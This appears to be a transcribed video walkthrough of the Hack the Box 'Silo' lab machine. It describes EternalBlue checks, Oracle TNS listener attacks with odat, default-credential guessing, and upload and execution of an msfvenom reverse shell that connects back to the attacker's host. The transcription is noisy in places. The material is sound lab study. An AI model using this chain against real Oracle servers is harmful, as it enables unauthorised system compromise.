Alright, what's up everybody? This is Toby again with Online Security, and we are back with another box from HTB. Okay, another machine from Hack the Box, and this time what we're going to be doing is focusing on the Silo box. Alright, Silo is a Windows operating system that actually introduces us to a new service. Well, maybe not a new service for most, but a new service that I've never encountered here on Hack the Box. So let's go ahead and have some fun with this. I have already popped some shells on this box. I actually wrote a write-up yesterday on it as well. I'll post a link in the description. Hey y'all, if you're liking these videos, do me a favor and smash the like button. Also leave a comment if there's a particular box that you want to see and if you enjoyed this. Alright, maybe there's something you want to see different. Maybe there's a way that you learn better. Leave that in the comments below and we'll try to make things work for you as well. Alright, so let's go ahead and get started with this. So first things first, we're going to run our nmap scans. Okay, nmap does bring back a few ports that are interesting. I'll scroll up here. Alright, we have port 80. Okay, port 80 looks like it's running an IIS server. Okay, we have port 135, 139, and 445 SMB services. We see 1521 and 8080. Looks like they have some Oracle services here. And then a bunch of other Windows RPC ports, right, and another TNS listener. So first things first, right, let's check out what this website or this web page has in store for us. So we go here, silo.htb. I did add this into our host file. I will show you. Cat etc host. That is it right here. IP map to the domain that we just added. Whoops. So this is it. Nothing crazy going on, just your generic IIS homepage. You can go back into the source code here and nothing actionable, right? Nothing we can use. At least nothing I use or I could find to use. Alright, remember there was another port open though. Port 8080 was open. Looks like it's some type of HTTP service. And when I did my write-up, or when I first connected to this port, a login screen popped up like this. But when I was doing my write-up and I tried to get this to come up again, it just wouldn't work. Right, I'm not too sure why. Maybe some network connectivity issues. There are a lot of those with these retired boxes, but here it is. Right, you can try to brute force this if you want to. I didn't try to brute force it. I just knew it was here. And you know, I just kept this in the back of my mind. If I do find some credentials, I'll try to pop it over here to see what we get back. So if I'm being honest here, I did try to look for some exploits for IIS 8.5. Couldn't really find any to get a shell or to get control of the box. I did try the Eternal Blue exploit against these SMB services. That didn't work. Okay, Eternal Blue, we can try it now. Okay, I just run psource command. This is gonna put me into my Python environment that's running Python 2. And if I try the SMB exploit, Kazekage, Uchiha, Blue, let's see, that's not right. Let me see. So Blue. Let's see what's over there. Okay, yeah, I gotta start it up with Python, right? eblue checker.py. Give this. So this comes from a repo. Okay, this eblue Eternal Blue exploit. I can't remember the name of the repo, but it's in one of our boxes that we did. If we run the checker.py, we get an access denied, right? Trying to connect, login failed, status access denied. We could, for this, if you remember, what you want to do is add the guest account into the script. Alright, you want to add the guest account here. I'm not going to do that right now. But even when you add the guest account, actually let's just do it. even when you add the guest account, it doesn't work because it looks like the guest account was disabled. So let's go ahead and add guest here. Right, and this is all to try to exploit those SMB services. So we just added the guest account. So now let's run it. Python 8 blue, checker.py. And we get a different error now, right? Initially we got the status access denied. Now we're getting the status account disabled. So SMB, the eternal blue vulnerability doesn't, or exploit doesn't look like it will work on this system. They may have disabled that guest account, which is why we're probably getting this error. And that's okay. That's good. That's being mitigated, right? Not good for us because we have to figure out another way to get through. So the way we're going to get through on this box is actually with those SMB, well, not SMB, those Oracle services that we saw running. And so we tried everything up here, right? Port 80 didn't give us anything, nothing crazy on the web page. Port 135, the SMB services, these aren't giving us anything. Eternal Blue didn't work. Maybe there's some other SMB exploits that you could try. I didn't try them. Please let me know in the comments section below if you were able to get one of those to work. So we come over here to Oracle, right? When I first started this box, I did not know what Oracle TNS Listener was. I knew what Oracle is, right? It's a database. But I really wasn't sure about what these things were. So this made me stop and pause to do some research on what Oracle TNS is, what Oracle XML Database Enterprise Edition is. And I did learn a boatload of information about this, which I'm excited about. And I'm hoping to see this service in the future so I could try this TNS exploit again. So Oracle TNS is a listener. All right, it's a listener that Oracle uses to manage requests going to the database server. Okay, so clients that are trying to interact with the database server, they have to talk to the listener first. Now there's a vulnerability that we found in this listener. Okay, if we just Google this right here, you will see that there's a bunch of different exploits or different talks about this TNS listener. Okay, just different blogs, different exploits. There are YouTube videos on this, write-ups, a bunch of different things here, and they're all mentioning something similar, right? The TNS listener. There's a poison attack. It's called TNS poisoning. You can see that here, TNS poisoning. You can see here, I actually opened this up to learn how to hack the Oracle database server. Okay, I did a lot of research on this here. It took some time. I actually had to take some step away from hacking this box to learn more about it and learn more about this tool right here that we will be using to abuse that vulnerability in the TNS listener. All right, there's a vulnerability in the TNS listener and that allows threat actors or people like ourselves to intercept information going to the TNS listener, information that allow us to interact with that database server, right? And when I mean interact, we can upload files to the database server, we can execute them, right? But we need to do a little bit of enumeration before we can actually upload files and execute them. Okay, that is my takeaway from my research on this TNS poisoning exploit. Okay, I'm pretty sure other people could explain it a lot more, or a lot better than I just did. But nonetheless, the TNS poisoning attack is going to allow us to get a shell, right? Send a reverse shell up to the database server and execute it using this tool called odat. Now odat is pretty cool. Actually, for some reason my GitHub pages are not working correctly right now. So odat is pretty cool. All right. I'm not really going to go into all the switches and commands here, but if you wanted to learn more about it, just scroll down to the bottom. I think this was it. There's like a there's a page this guy created to show you how to use it. I can't remember where it is here, but it's somewhere on this page. This might have been it. Yeah, so this is a little bit about it. Maybe there are write-ups on this. I'm not sure. Maybe people who were working on this silo box made some write-ups on how to use it. But this is a good starting point, and you'll see how we use it here, or how I kind of used it to figure out what switches were doing what and how to use them, right? Just use it. And if it doesn't work, most times these tools tell you why or what you're missing for it to work. So odat, we're gonna have to download that. Well, going back to odat, this is an Oracle database pen testing tool. Okay, we can use it to do a bunch of stuff actually. Let's read the README file. So if you wanted to escalate your privileges, if you want to execute system commands, if you wanted to find valid credentials, or the SID, which is an identifier for some of these databases, we could use odat, right? It's an attacking tool that targets Oracle databases. Okay, so this is what we're going to use. You can download this repo if you want to and do all this cool setup stuff over here to get your environment working, or you could just use the standalone file. So you don't have to set up your environment to get this working. The standalone file is right here. Okay, I have it opened up. Well, no, I don't. So if I just click this, you will see these 3 files here. Okay, I went ahead and just downloaded this. All right, you download that. Here, I'll show you how we do it. Let me get that back. Just copy this link. Go here. This is going to download a tar file. Okay, I will move mine into odat backup. This is what I have, so I'm just going to move that. And I'm going to move that tar file here. So this is the tar file we just downloaded. Alright, so to get this to work, you have to untar it first. ZXVF is usually what I use to untar things. Okay, you run this command, it's going to untar it. And then you can see the new directory we untarred. I'm going to remove that tar file. And I'm going to rename this odat to just odat. Okay. And then let's change directories to odat so we're inside of it. And now we're in it. Okay, so odat, remember this is a attacking tool against Oracle databases. This is the binary that we're going to be running right here. Okay, so if I run it with the -H, it shows you all of these different modules that odat can use, right? There's an all module if you just wanted to use everything here. What we'll be using is this SID guesser. We'll need the SID guesser to get the SID, right? The SID is like a nickname for the databases. It's just a system identifier for some of the databases or services, tables. I'm not sure which one particularly, but it's an identifier for some of the databases and services on this system. So we're going to be using the SID guesser to get the SID. We need that, the SID, to interact with the database. Then once we get the SID, we're going to try to guess the credentials for that. Try to guess some credentials with the password guesser. And then after we do that with the password guesser, we're going to use the util module, the UTL file, to upload a reverse shell. Right before we upload it, we need to create the reverse shell with MSF Venom. And then we're going to use this external table to execute that reverse shell that we uploaded with UTL file. So that's what we're going to do. So the first thing we need to do is, y'all, is get this SID guesser, or use the SID guesser. And if we're not familiar with how to use these things, it's okay. You can use that Git repo to learn more about it, or you could just ask odat how to use it, right? So if we do, I'm going to clear the screen, odat sid guesser -h, it'll tell us what we need to use to run this. All right, so we're going to need this server, the server IP, we're going to need the port number, we're going to need the user, the password, and the SID, but we don't have a username and password. So we're just going to give it the SID, okay, and the system and the port number. So let's do that. So we'll do this, odat -s, our IP is 82-p 1521. We don't have the SID yet, so we can't use that either. So let's, got to tell odat to use the SID guesser module. Hit enter. Now this takes a little bit of time. So what it's doing right now is it's poisoning the listener to try to grab some SIDs. Okay, remember the SID. Here, let's go ahead and Google it. What is SID in Oracle? Okay, the system identifier is a unique name for an Oracle database instance on a specific host, right? It's just like a nickname. But this is what we're going to use to interact with that database. Okay, and the SID we get back is XE. So now we have XE. Okay, so the next we have an SID. Now we can use this SID to guess the password, right? But we're going to need, I just canceled that out. We're going to need the password guesser. So how do we use this? You just ask odat. odat is going to tell you that, once again, we need the server IP, we need the port number, we need a username, we need a password, we need the SID. We don't have these two right here. Okay, we don't have the username and password. However, we can still run this without it. Okay, we can still run this without it. You can see the options here as well. Another thing we're going to need for this, the password guessing option, is the file that the password guesser is going to use. It needs to be a file of username and passwords. Okay, that's what this switch is here. We're going to use this switch to point to our file. And by default, it is using this file, this username and password file, which is here. Right? If we do, it's inside of this directory we're in. It's right here, this accounts file. If we just head accounts.txt, you'll see the first 10 lines here. Looks like it's username / password, username / password. That same standard throughout the file. So now that we have that, all right, we kind of have an idea of how to use this password guesser. So let's use it, odat. I'm going to clear the screen first. So odat, password guesser, right? Password guesser -s 10.10.10.82-p. This is the port number that we found from nmap. -d, that's going to be our SID. -accounts -file, right? That's the switch. Now we have to point to the file. Accounts.txt. Let's run this. We are missing something. Okay, I spelled accounts wrong. Alright, now this is the one that actually takes a while. Okay, this takes a while. This does take a while. In the meantime, while this is running, because I actually don't want to. Alright, so this is what I wanted it to show us first before I went forward. So it's going to ask you about these questions. We're just going to continue, so we just hit C. Okay, we're going to hit C so it can continue the password guesser. But like I said, y'all, this is a pretty cool box to learn more about Oracle databases. If you're not familiar with database services, this was a great box to to learn more about it, right? Hopefully you all pause from your challenge, you take a step away to go learn more about what this service is doing, what it entails, and what Oracle, like, why is it vulnerable, right? What is this TNS poisoning attack, right? Why are we able to grab the SID with it? Why are we able to, we haven't seen it yet, but why are we able to upload files to the database server using this tool, right? So that's really going to bring us back to what this Oracle TNS poisoning vulnerability is all about. Okay, and this is actually what I did to learn more about it. Right, I just opened up the first three things. Right, I actually went to YouTube as well to learn more about this. Okay, no, I didn't read this one right here. Not this one either. Oracle TNS. We don't have access to that. Looks like our password cracker came back with something. So the Oracle TNS vulnerability, this is a good blog here about it. Talks about the vulnerability. The attack point of this vulnerability, again, is the Oracle listener. Remember that TNS listener. Okay. And it can be exploited without authentication. Remember, we don't have any creds right now. Right? We do now since our password cracker's has completed. But I'll post this link in the description below so you all can get some more understanding of Oracle, the Oracle TNS poisoning attack. So here are the credentials. These are actually default credentials for Oracle. Scott/Tiger, username Scott, password Tiger. And now that we have credentials, you know, one thing I didn't try though was to put that here. Let me see. No, that doesn't work. Okay. Now that we have credentials, we can use the other module, the UTL file, right? And this is another way to figure out what to do. It's going to tell you, hey, you're missing the -s option, right? But we're going to use this UTL file to upload our shell. So here it is. These are the options here: server, port number, the username we just found, the password we just found, and the SID. Okay, this is going to upload. Oh, one more thing. This switch, the -- put file switch, right? This switch plus the remote path we want to upload something to, the name of the file we want how we want the file to be named on the remote system, and the name of the file on our local system. All right, so it'll make more sense when we actually go through it. So the odat -s 10.10.10.82 -p for the port number, -u, which was Scott, -p, which was Tiger, -d, remember this is our SID, and then the put file, we want to put it in the temp directory. We want to call it shell.exe, and we are going to name it shell.exe once we make it. I didn't make it yet, so let's go ahead and do that. I'm going to change directories to odat so the shell is there. So I'm just going to do msf venom -p Windows shell reverse TCP lhost equals 10.10.10. Actually, that 14.13 L port equals 1234. Gonna make this an exe, and we're gonna name it shell.exe because that is what the local file has been set to on that string. So we're gonna go ahead and run that. Okay, and this should be done now. Alright, so we got a shell back now. Shell.exe. Now before anything, I'm gonna clear this out. start up our listener on 1234 because that is the port number we gave it. Execute this. Oh, actually, we're just putting it up there right now. We're not executing it. What's wrong? Oh, we didn't give it the module name. And I think that was util file, right? Yeah, there it is, UTL file. So that's going to upload it there. And we get insufficient privileges. So we don't have permissions to upload it onto this XC database. Now, this brings me to another point, another learning point. All right, so Oracle has a pseudo-like option, right? You notice over here I used sudo to start up this reverse shell or start up this listener, right? I need to escalate my privileges in order to run this command. Well, same thing with Oracle. We need to escalate our privileges in order to use this. So, but instead of sudo, we're going to use --sysdba. sysdba. So this is going to kind of I'm throwing up air quotes, behave like sudo. It's going to escalate our privileges the same way sudo escalates our privileges here. So now let's rerun that. And the file is now on the system. Okay, since the file is on the system, we're going to use the last module that we talked about, the external table module, to upload or to execute our shell. So how do we use this? Same thing. Okay, it's going to be using similar syntax, the server IP, the port number, the user, the password right here, and then the SID. And there is another option though. Yeah, so we're going to use this --exec switch, tell it the remote path of where our file is, and then the name of the path, the name of the file. So once again, it looks easier. It makes more sense when we do it. So odat-s, all right, this is the system IP, the port number with -p, the username, Scott-p, --P for the password, which is Tiger-D for the SID. Remember, that is how we are identifying the database. The exec switch to execute our shell.exe that lives under the temp directory. And if we run this without the sysdba, it won't work, right? It won't work if you don't give it the external table either, right? Okay, we don't have privileges, so what do we need to do? We need to escalate our privileges, and boom, we get a shellback. Okay, we get a shellback as the system user. So this is pretty cool to do, y'all. It wasn't as straightforward. If you didn't understand Oracle databases, you may have had to do what I did and just step away for a bit to learn more, right? Learn more about the service that you're exploiting and why it may be vulnerable. All right, so that's it for this video, y'all. If you like this video, please do me a favor and smash the like button. Leave some comments below on your thoughts. That would be great, so we can keep making better videos and better ways to learn. All right, other than that, I will see you all later. Give your loved ones a kiss, hold on to them, and don't forget to study, y'all. Keep brushing up on your skills. These are skills like a language, right? If you don't use a language, maybe Spanish, maybe Hindi, whatever it may be, if you're not using it, you could lose it. So keep using these skills, keep getting better, keep studying, keep challenging yourself, and I'll see you all next time. Peace out.